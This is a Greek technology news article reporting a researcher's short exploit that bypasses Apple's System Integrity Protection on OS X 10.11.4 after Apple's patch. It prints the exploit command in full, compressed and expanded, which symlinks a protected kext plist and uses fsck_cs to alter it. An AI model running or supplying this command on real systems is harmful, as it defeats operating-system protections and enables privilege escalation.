To exploit που διαλύει την ασφάλεια του OS X χωράει σε ένα tweet

Κυκλοφορεί τώρα: Νέο λειτουργικό exploit για συστήματα Mac OS X και iOS. Χρησιμοποιείτε υπολογιστή της Apple και εγκαταστήσατε την πιο πρόσφατη ενημερωμένη έκδοση του OS X 10.11.4;  Αν ναι, θα πρέπει να γνωρίζετε ότι η Apple με το συγκεκριμένο απέτυχε να προστατέψει τους χρήστες του λειτουργικού της συστήματος. os x exploit

Η είδηση μάλλον ​​θα απογοητεύσει πολλούς χρήστες της Apple, καθώς οι τελευταίες ενημερώσεις του OS X El 10.11.4 και του iOS 9.3 εξακολουθούν να περιέχουν μια ευπάθεια που επιτρέπει κλιμάκωση προνομίων και θα μπορούσε να επηρεάσει τους 130 εκατομμύρια πελάτες της Apple.

Την περασμένη εβδομάδα, αποκαλύφθηκε με μια κρίσιμη ευπάθεια που επέτρεπε κλιμάκωση προνομίων στο δημοφιλή μηχανισμό ασφαλείας της Apple System Integrity Protection (SIP), που επηρεάζει όλες τις εκδόσεις του λειτουργικού συστήματος OS X.

Αμέσως μετά η Apple προσπάθησε να διορθώσει την κρίσιμη ευπάθεια με τα τελευταία patches που κυκλοφόρησε για Mac και iThings. Όπως φαίνεται όμως το ασφαλείας SIP μπορεί ακόμα να παρακαμφθεί ακόμα και μετά την κρίσιμη ενημέρωση ασφαλείας, αφήνοντας τους χρήστες της Apple ευάλωτους σε κακόβουλους χρήστες που θα μπορούσαν να αποκτήσουν πρόσβαση εξ αποστάσεως στις συσκευές τους.

Το ενδιαφέρον μάλιστα είναι ότι ο Stefan , ένας ερευνητής ασφάλειας από τη Γερμανία, κυκλοφόρησε ένα νέο exploit που παρακάμπτει την τελευταία έκδοση της patched εφαρμογής SIP και χωράει σε ένα tweet.

Παρακάτω είναι το exploit που μπορεί να χρησιμοποιηθεί για να τροποποιήσει κρίσιμα ρυθμίσεων του OS X, που ούτε καν ο χρήστης root επιτρέπεται να αγγίξει.

ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot

Ας το ξεδιπλώσουμε

    ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
    fsck_cs /dev/diskX 1>&-
    touch /Library/Extensions/
    Reboot

iGuRu.gr The Best Technology Site in Greeceggns

Get the best viral stories straight into your inbox!















giorgos

Written by giorgos

Ο Γιώργος ακόμα αναρωτιέται τι κάνει εδώ....

Αφήστε μια απάντηση

Η ηλ. διεύθυνση σας δεν δημοσιεύεται. Τα υποχρεωτικά πεδία σημειώνονται με *

Το μήνυμα σας δεν θα δημοσιευτεί εάν:
1. Περιέχει υβριστικά, συκοφαντικά, ρατσιστικά, προσβλητικά ή ανάρμοστα σχόλια.
2. Προκαλεί βλάβη σε ανηλίκους.
3. Παρενοχλεί την ιδιωτική ζωή και τα ατομικά και κοινωνικά δικαιώματα άλλων χρηστών.
4. Διαφημίζει προϊόντα ή υπηρεσίες ή διαδικτυακούς τόπους .
5. Περιέχει προσωπικές πληροφορίες (διεύθυνση, τηλέφωνο κλπ).